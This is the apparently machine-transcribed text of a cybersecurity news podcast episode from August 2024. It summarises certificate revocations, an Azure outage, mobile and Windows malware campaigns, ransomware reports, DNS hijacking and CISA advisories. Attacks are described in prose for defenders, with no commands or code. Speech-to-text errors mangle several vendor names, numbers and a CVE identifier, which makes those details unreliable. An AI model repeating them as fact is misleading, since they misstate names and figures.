Revoked Certs, Microsoft Outage, and Sitting Ducks

[Music] Mass certificate revocation Azure outage Android users be aware of some new malware highest known payout to a ransomware actor average data breach cost Rose One Drive Fishing campaign fake Google Authenticator Sitting Ducks DNS attack sisa publishes nine IC advisories and one not exploited vulnerability all this in more in today's episode of the cyber security Digest [Music] [Applause] hello and welcome back to the cyber security digest where our goal is to help you stay informed so you can stay secure today is Friday August 2nd 2024 to our firsttime listeners welcome and to my return listeners welcome back as always I appreciate you taking the time out of your day to check out the show if these episodes help help you stay informed I would greatly appreciate it if you would please share this show out with a colleague or someone you know who likes staying up to date on the latest cyber security news just as a quick reminder our podcast is now released twice a week on Tuesdays and Fridays with fewer episodes as mentioned previously we've divided the show into three sections to help you digest it better first we have notable news second prevalent patches and lastly our cisa corner I would love your feedback on the show and in today's show notes as last week's as well there is a survey if you wouldn't mind filling that out that lets me know how I'm doing and areas I can improve upon all right we have a very jam-packed episode so let's dive on in it is time for our first section notable [Music] news if you use diger you most likely are already aware of this one but on Monday diger posted an article highlighting that they would need to start revoking certain certificates the certificate that would be revoked were due to the fact that they lacked proper domain control verification or dcv this issue arose because some cname based validations did not include the required underscore prefix in the random value this affected about 4% of domain validations according to Jeremy Rowley on bugzilla this impacted 83,7 certificates that were held by 687 of their customers the problem originated ated from a modernization project in 2019 that removed the automatic addition of the underscore prefix and some validation paths this oversight was not detected during digs reviews or regression testing a recent user experience enhancement project inadvertently corrected the issue by including the underscore prefix and all random values this whole entire issue stems from that missing uncore prefix which is in some cname based valid ations this is required by cabf roles to prevent potential domain name collisions if you don't know the cabf or the ca browser forum is an organization that brings together certificate authorities and browser vendors to develop and promote standards although the chance of collision is low compliance requires revocation of non-compliance certificates within 24 hours affected customers were notified that they would need to reissue their certificates to avoid Revenue ation diger did provide impacted customers with instructions on how to reissue their certificates diger states that in order to prevent these actions going forward they have already taken several steps as well as plan on taking more to prevent this from happening again for a full list of these preventative measures you can find the diger article in the show notes on Tuesday July 30th diger had published an update stating that they were aware of several customers operating within critical infrastructure that were unable to update their certificates within the 24-hour time frame diger stated that those critical infrastructure businesses that were unable to replace their certs could request an extension that was due on July 31st if approved certificates would have until 19:30 UTC on Saturday August 3rd 2024 to be replaced all right onto our next story here also occurring on Tuesday Microsoft Azure and Microsoft 360 5 customers began to experience outages across numerous Microsoft Services impacted Services included Microsoft entra Microsoft purview Microsoft 365 as well as several Azure services including Azure portal Azure policy Azure app Services among others according to Microsoft's mitigation statement they said and I quote an unexpected usage Spike resulted in Azure front door afd and Azure cont content delivery Network CDN components performing below acceptable thresholds leading to intermittent errors timeout and latency spikes while the initial trigger event was a distributed denial of service or dos attack which activated our dos protection mechanisms initial investigations suggest that an error in the implementation of our defenses Amplified the impact of the attack rather than mitigating it end quote their mitigation statement also highlights how the they responded to the outage stating that once they had identified the cause they began to attempt to change network configurations to help deal with the reported dos attack Microsoft also stated in their statement that they will publish a final post incident review with Comprehensive details within the next two weeks once this becomes available if there's anything worth noting I'll be sure to fill you all in all right Android users you want to be aware of this next one on Wednesday imperium's research published a blog post that delves into a sophisticated Android targeted SMS stealer campaign that has been tracked by their researchers since February 2022 The Campaign which has identified over 107,000 malware samples highlights the evolving nature of mobile malware and the deceptive tactics used by attackers to compromise devices the malware primarily targets onetime passwords which are crucial for MFA making them valuable to attackers the blog post elaborates that the infection process begins with deceptive tactics such as malicious advertisements and telegram Bots which trick users into downloading and installing the malware these methods mimic trusted sources convincing victims to sideload malicious applications onto their devices once installed the malware gains permission to read SMS messages enabling the theft of sensitive data including otps or one-time passwords the art itical details the various techniques used by attackers to establish command and control channels initially Firebase was used but the attackers later shifted to using GitHub repositories to share command and control details and distribute malicious apks this Evolution demonstrates the attackers adaptability and the sophistication of their methods the scale of the campaign is significant with malware capable of evading detection by many antivirus Solutions the Financial motive behind the campaign is evident as the stolen credentials are used for further fraudulent activities such as creating fake accounts and launching fishing campaigns the use of cryptocurrency payments further obscures the attacker's identities Imperium emphasizes the need for a multi-layered approach toward mobile security combining Advanced detection Technologies with user education and awareness for more information about the threat actors as well as for the ioc's please review the full article from Imperium Linked In the show notes all right next up in today's episode we're going to talk about two annual reports that came out since our last episode these reports highlight the impact and cost ransomware and data breaches have had on businesses over the last year I will have links to both of these reports attached in the show notes for your convenience all right let's go ahead let's review some of the key takeaways from these reports first zscaler annual ransomware report dropped like a hot new mixtape from your favorite rapper in the report zscaler lists their observed top trends in targets top ransomware families as well as predictions for the upcoming year early in the report Z Skiller states that their threat Labs research uncovered a record-breaking Ransom payment of 75 million us this payment is now the largest publicly known payment to a ransomware group and the payment was received by the Dark Angels ransomware group some other notable statistics covered by the report are that they observed the manufact facturing Healthcare and Technology sectors among the most targeted additionally noted in the report was that the United States was the most targeted country followed by the UK Germany Canada and France the report also highlighted several of the major vulnerabilities that had enabled some of these attacks occur over the past year these included vulnerabilities such as Cisco's ASA software connectwise screen connect Cisco's Remote Access VPN as well as flaws that existed within citric netscaler 8 DC and net scaler Gateway as stated a few episodes ago Cloud Flair had observed an attack go from po to attempted exploit in under 30 minutes it is so important that as Defenders we stay ahead of these threat actors the report from Z scaler goes on to highlight some other Trends observed over the past year as well as named the following as the top five ransomware families to watch for in the coming year number one was Dark Angels number two lock bit three black cat four Kira 5 black Basta Z skiller's report was a great read and if you would like to check out the full report for yourself I've linked it for you in the show notes the other report that came out was IBM released their 2024 cost of a data breach report this report had some pretty intriguing findings as well first the report highlighted the global average cost of a data breach increased by 10% to $4.88 million us this is the highest jump since the pandemic it is also worth noting that the report calls out that this average cost Rose to $4.9 million when the attack was caused by a malicious Insider the report also highlighted that extensive use of AI Tools in automation reduced breach costs by an estimated average of $2.2 million us some other statistics that I found interesting when I was reading the report was that IBM reported 46% of breaches involved customer personal data I was was really impressed with the time frame IBM stated it took to contain a breach involving stolen credentials this is not a good impression mind you it was one that was kind of more shocking than anything in the report IBM States and I quote breaches involving stolen or compromised credentials took the longest to identify and contain of any attack Vector end quote the report states that this time frame was 292 days as we have discussed in past episodes with info Stealers and all the different fishing campaigns that are going on out there these statistics are concerning this report goes into a lot more detail we unfortunately don't have time to dive into everything within this episode however as with the zscaler report I have linked the IBM report if you are interested in reading it in the show notes these reports are really great if you are in a position where you need to help convey potential risk to your leadership I highly suggest that you review both of these reports to educate yourself as well as use them for your advantage earlier in the week trell's Advanced Research Center published a blog post discussing a recently identified sophisticated fishing campaign that was targeting Microsoft One Drive users trellix researchers state that this campaign employs social engineering tactics to deceive users into executing a Powershell script which compromises their system the attack begins with an email containing an HTML file that when opened displays an image simulating a Microsoft One Drive error message this message urges users to fix a DNS issue by clicking a button which ultimately leads them to execute malicious commands the fishing emails. HTML file includes an image designed to create a sense of urgency increasing the likelihood that the user will follow through with the provided instructions the image mimics a one drive page with an error message and two buttons those buttons are details and how to fix while the details button directs users to a legitimate Microsoft learn page the howto fix button triggers a malicious script this script instructs users to open the windows Powershell terminal and execute a command that downloads and runs a malicious payload the malicious command first flushes the DNS cache then creates a folder on the C drive named downloads it downloads an archive file into this location extracts its contents and executes a script using autoit 3.exe the attack concludes with a message indicating that the operation was successful further deceiving the user the full blog post from trellix goes into greater technical detail as well as contains visual examples of the malware as well as has a list of ioc's as with all of our other articles that we talk about on the show there is a link in the show notes Also earlier in this week on Tuesday malware bites lab published an article that they identified a threat actor who had impersonated Google through a fake ad for Google authentic Ator this malicious ad appeared in Google search results tricking users into downloading malware instead of the legitimate multiactor authenication program the core issue lies in the misuse of a brand trust as the ad seem to be from an official Source leading users to a decoy website that hosted malware the fraudulent website Chrome web hyen authenticators decom was registered on the same day the ad was observed by malware byes Labs the site source code revealed that it downloaded a malicious file authenticator deex from GitHub the threat actor used GitHub to host the malware to evade conventional security measures the malware identified as deer stealer exfiltrate personal data to an attacker controlled website the article emphasizes the importance of distinguishing real advertisers from fake ones to prevent such attacks it highlights the irony of users getting compromised while trying to enhance their security by downloading a trusted tool like Google authentic Ator the misuse of Google ads for Distributing malware erodes trust in Brands and the Google search platform itself to mitigate such risks the article recommends avoiding clicking on ads to download software and instead visiting the official website and repositories to download directly if you use malware byes guess what they've already updated and are blocking this specific malware if you do not have malware byes they also have ioc's as well as a hash for the payload and an address for the command and control server that you can find in the full report from malware bites all right let's move on here from malware bites to our next piece of research which is from cify on Wednesday threat researchers at cify reported on the emergence of a new Android remote access Trojan named Bingo mod this was identified in May 2024 the report states that this malware is part of the modern remote access Trojan generation enabling threat actors to conduct account takeover directly from infected devices using on device fraud techniques Bingo Mod's core component initially known as CHR update allows for remote access and control similar to other banking Trojans like Medusa copy Bara and t-bot the malware's primary advantage is its ability to bypass various behavioral detection counter measures although it requires a live operator to authorize money transfers limiting its scalability Bingo mod employs several sophisticated techniques to evade detection and hinder forensic analysis it uses device wiping after successful fraudulent transfers a tactic reminiscent of the BR malware the self-destruction mechanism eradicates any trace of the Mare's activity making it challenging for researchers to identify and attribute incidents cify researchers noted the malware also leverages obfuscation techniques to reduce its detection rate by antivirus Solutions indicating the developers focus on opportunistic rather than tailored approaches the malware is distributed via smishing and often Mas grades as legitimate anti virus applications once installed it prompts users to activate accessibility Services disguising the request as necessary for the app's functionality upon granting permissions the malware unpacks itself and sets up a command and control Communication channel Bingo mod provides around 40 remote control functions including real time screen control fishing capabilities through overlay attacks and the ability to send SMS messages from the compromised device Bingo mod security measures include hindering system settings editing blocking specified applications and uninstalling arbitrary apps to prevent detection its most notable feature is the ability to remotely wipe the device typically executed after a successful attack like mentioned earlier the malware's Reliance on manual intervention for account takeover activities limits its scalability and exposes operators to higher detection risks for the full article as well as ioc's please check for the full report from cify in the show notes on Wednesday the threat Intel teams at eclips and info blocks reported of a significant vulnerability in the domain name system infrastructure termed Sitting Ducks this vulnerability has been exploited by multiple threat actors since at least 2019 leading to malware delivery fishing brand impersonation and data exfiltration the reports from these companies highlights that the core issue lies in the weak or non-existent verification of domain ownership by DNS providers which allows attackers to hijack domains The Sitting Ducks attack occurs under specific conditions eclips States these conditions in their article and they are as as follows and I quote a registered domain or subdomain of a registered domain uses the authoritative DNS Services of a different provider than the domain registar this is called name server delegation a domain is registered with one authoritative DNS provider and either the domain or a subdomain is configured to use a different DNS provider for authoritative name service the name service delegation is lame meaning that the authoritative name server does not have information about the domain and therefore cannot resolve queries or subdomains the DNS provider is exploitable meaning that the attacker can claim ownership of the domain at the delegated authoritative DNS provider while not having access to the valid owner's account at the Domain registar end quote attackers can claim ownership of the domain at the delegated authoritative DNS provider without accessing the valid owner's account at the Domain registar this scenario is more common than it might seem an active exploitation has been confirmed the article explains that sitting ducks is a new issue but falls into a broader category of DNS related vulnerabilities lame delegation occurs when an name server is assigned to provide authoritative DNS records but lacks the necessary information attackers can exploit this by registering the assigned name server domain gaining access to all domains pointing to it additionally dangling DNS records which contain invalid information due to forgotten configurations can be exploited by malicious actors who register laps domains to mitigate the risk of sitting duck attacks the article recommends several steps for domain owners and DNS service providers domain owners should ensure that they use the same provider for both domain registration and authoritative DNS Services check for invalid name server delegations and inquire about their DNS providers mitigation measures DNS service providers should Implement verification processes to ensure that account holders claiming domain names actually control them such as issuing random names server hosts that require changes at the registar researchers from infol blocks and eclips have been working with law enforcement and National CS since June 2024 to address this issue if you'd like to read more about this fantastic research please find the links to both articles in the show notes on Thursday proof Point published a Blog discussing a cluster of cyber criminal activities which have been leveraging Cloud flare tunnels to deliver malware this activity first observed in February 2024 has increased significantly from May through July the attackers exploit the tri Cloud flare feature to create one-time tunnels without needing an account allowing them to remotely access data and resources proof Point notes that the campaigns primarily lead to the installation of xorm a remote access trojen but have also delivered other malware like async rat Venom rat go loader and Ros the article describes the attack chain typically begins with messages containing a URL or attachment leading to an internet shortcut file or URL when executed this file connects to an external file share to download an lnk or VBS file which then executes a bat or command file to download a python installer package this package ultimately leads to the malware being installed the campaigns often use business relevant themes like invoices and document requests to lure victims the threat actors have evolved their tactics over time incorporating obfuscation in their scripts to evade detection proof Point notes that the attacker's use of temporary cloudflare instances provides flexibility and makes it harder for Defenders to block their activities also as noted in the blog posting this requires significant victim interaction so please ensure that your users are aware of this attack Vector so they know not to execute these files they should also know not to execute unknown files and this would be a really good way for you to remind them with something relevant if you would like to read more about this attack as well as a list of signatures and ioc's from proof point the full article can be found in the attached show notes lastly rounding out our notable news section for this episode if you live in the southeastern United States be advised that your capability to get blood in the event of a medical emergency may be slightly more difficult right now on Wednesday one blood a not for-profit blood center posted that it had been impacted by a ransomware attack Susan forbs one blood senior vice president of corporate Communications and public relations stated and I quote one blood takes the security of our Network extremely seriously our team reacted quickly to assess our systems and began an investigation to confirm the full nature and scope of the event our comprehensive response efforts are ongoing and we are working diligently to restore full functionality to our systems as expeditiously as possible end quote in The Advisory from one blood they also suggested that if you live in that area and are able to donate it would help make a difference due to the impact that this has had on blood in that area if you'd like to read the official statement from one blood I have linked it in the show notes all right it is time to move on to our next section of the show prevalent [Music] patches all right first up in prevalent patches auntu has had several patches come out this week resolving vulnerabilities across several of their products also we had some advisories from Red Hat Linux as well since our last show in fact there's been about 50 advisories for their products including Red Hat Enterprise prize Linux as well as open shift all right that does it for prevalent patches here today on to our last segment of the show and that is our sisa [Music] corner all right Welcome to our final segment of the show our cissa Corner first up in our cissa corner here today is the sole addition to the known exploited vulnerability catalog this is for the VMware esxi vulnerability that we discussed in our last episode this vulnerability is tracked as cve 2024 37805 if you wouldd like to hear more about this vulnerability I suggest you listen to the last episode where I discussed the vulnerability that was discovered by Microsoft more in depth Additionally you can find more details surrounding the cve in the show notes also since our last episode sisa published nine new industrial Control Systems advisories five of these advisories are for Johnson Controls exact Q Vision one is for avtech IP camera one for vet's Wi-Fi Bridges and one is for Rockwell Automation logixs controllers if you'd like to read the full details about these IC advisories I have linked the sisa document in the show notes lastly on Thursday sisa announced that they had selected Lisa Einstein as sisa's first Chief artificial intelligence officer sisa stated that this selection reflects our commitment to responsibly use AI to advance cyber defense the full press release can be found in the show notes as well if you'd like to read more about that all right everyone thank you so much for tuning in to today's episode of the cyber security digest as mentioned earlier all links and articles mentioned in the show are in the show notes Additionally you can head to our website the cybercity digest.com to find our show notes as well as all of our previous episodes on the website you'll also find links to listen to this on your podcast platform of choice if you like this episode please consider sharing with someone you know who would like the show as well or benefit from the information I have provided lastly I would greatly appreciate it if you could leave this show a rating in your podcast platform of choice as mentioned in the beginning of the show in the show notes you'll also find a link to a form where I'm requesting your feedback if you wouldn't mind filling that out that will help me continue to improve this show all right before you head out for your weekend here's your Friday dad joke what do you call a lying dictionary a fictionary all right everyone thank you so much for tuning in and until next time stay informed to stay [Music] secure oh w [Music]